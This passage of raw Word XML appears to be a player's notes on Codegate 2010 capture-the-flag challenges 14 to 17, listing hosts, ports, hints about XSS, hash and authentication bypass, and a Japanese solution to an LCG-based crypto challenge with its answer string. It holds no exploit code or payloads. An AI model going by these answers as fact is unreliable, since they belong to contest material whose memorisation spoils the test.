          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1086" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc257340764"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge14</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:800   </w:t>
      </w:r>
      <w:r>
        <w:t>Not cleared</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2065" type="#_x0000_t202" style="width:437.4pt;height:40.85pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2065" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>http://ctf8.codegate.org/823851aa45ee6022e781cf4b15df3c32/index.php</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t xml:space="preserve"> hint : xss</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E795A" w:rsidRDefault="005E795A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1087" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc257340765"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge15</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:1200  </w:t>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:t>Not cleared</w:t>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2063" type="#_x0000_t202" style="width:437.4pt;height:56.85pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2063" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>credentials: http://ctf1.codegate.org/03c1e338b6445c0f127319f5cb69920a/web1.php</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>HINT: sha1(key + username + "|" + level), and key is 25 chars</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E795A" w:rsidRDefault="005E795A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1088" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc257340766"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge16</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:1500   </w:t>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:t>Not cleared</w:t>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Answer:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2061" type="#_x0000_t202" style="width:437.4pt;height:289.7pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2061" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>credentials: ctf3.codegate.org port 30909</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A"/>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>"Challenge 16, now rftpd binary can be download without password"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A"/>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>The original idea was to allow you to download only the coredump file</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t xml:space="preserve">but to make your life easier we allow you to downlaod the rftpd binary. </w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>The rftpd file that you get is exaclty the same program running in the</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t xml:space="preserve">ctf3 server but with a different secret key. </w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A"/>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>The goal is to download the 'secrets' file bypassing the challenge/response</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>authentication.</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A"/>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>What is that coredump file? Well the super secure rftpd server has some problem</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>and it crashes sometimes after clients send the 'nonce' command.</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A"/>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>PS. Get the binary again if you think you have an old one. You need to have</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>these files.</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A"/>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>f0ba2b19993e65d3b8bb589e7224db64  rftpd</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>740838db6109ec71302eb3f275cc9d17  core</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A"/>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>hint : 2010-0209 = inspiration</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="005E795A">
                  <w:r>
                    <w:t>hint2 : Harvest dumped seeds. Don't bruteforce blindly, synchronize.</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="009953C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E71451" w:rsidRDefault="00E71451">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1089" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="007406A1" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc257340767"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge17</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:400   </w:t>
      </w:r>
      <w:r w:rsidR="009953C5">
        <w:t>Not cleared</w:t>
      </w:r>
      <w:r w:rsidR="009953C5">
        <w:br/>
      </w:r>
      <w:r>
        <w:t>Answer:ULearnLCG4Fun&amp;Profit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2059" type="#_x0000_t202" style="width:437.4pt;height:68.3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2059" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="007406A1">
                  <w:r>
                    <w:t>credentials: ctf3.codegate.org port 10909</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="007406A1"/>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="007406A1">
                  <w:r>
                    <w:t>HINT: "Lucy in the CodeGate with diamonds"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRDefault="008A4C86" w:rsidP="007406A1"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="002A0D27" w:rsidRDefault="008A4C86" w:rsidP="007406A1">
                  <w:r>
                    <w:t>(NVM this sentense, beist thinks "it seems julianor likes beattles")</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007406A1" w:rsidRDefault="007406A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007406A1" w:rsidRDefault="00AA5FD6" w:rsidP="00A01E94">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2058" type="#_x0000_t202" style="width:402.2pt;height:44.6pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2058" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00A01E94" w:rsidRDefault="008A4C86" w:rsidP="00A01E94">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A01E94">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>@murachue a=1 c=1 m=255で送って戻ってきたものと"\x1\x2\x3\x4...."とXOR。</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00A01E94" w:rsidRDefault="008A4C86" w:rsidP="00A01E94">
                  <w:pPr>
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00A01E94">
                    <w:rPr>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>(実際は"\x2\x3\x4..."とXORになる)</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="007406A1" w:rsidRPr="006A2FB1" w:rsidRDefault="00A01E94" w:rsidP="006A2FB1">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:i/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>http://twitter.com/ucq/statuses/10501206541</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRDefault="00A01E94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRPr="00A01E94" w:rsidRDefault="00A01E94" w:rsidP="00A01E94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>a=1 c=1 m=255 X_0=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>としたとき、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>LCG</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>でえられる数列は</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>((1,)2,3,4,...,253,254,0,1,...)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>となる。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRPr="00A01E94" w:rsidRDefault="00A01E94" w:rsidP="00A01E94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRPr="00A01E94" w:rsidRDefault="00A01E94" w:rsidP="00A01E94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ctf3.codegate.org:10909</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>に送って帰ってくる</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>s=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>はたぶん</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>"Seed"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>だと思われる。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>(X_0</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>のこと</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>実際に帰ってきたバイト列を</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>2,3,4,...</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>で</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>XOR</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>すると答えが出てくる。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRPr="00A01E94" w:rsidRDefault="00A01E94" w:rsidP="00A01E94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRDefault="00A01E94" w:rsidP="00A01E94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>a=16807 c=0 m=2147483647</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>でやると、実際の出力は</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>a=16807 c=1 m=2147483647</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>と</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>がすり替わっている。この場合、数列の各値と</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>0xFF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>で</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>した値を</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>xor</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01E94">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>してやればちゃんと答えの文が見えた。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01E94" w:rsidRDefault="00A01E94">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E71451" w:rsidRDefault="00E71451">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1090" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009953C5" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
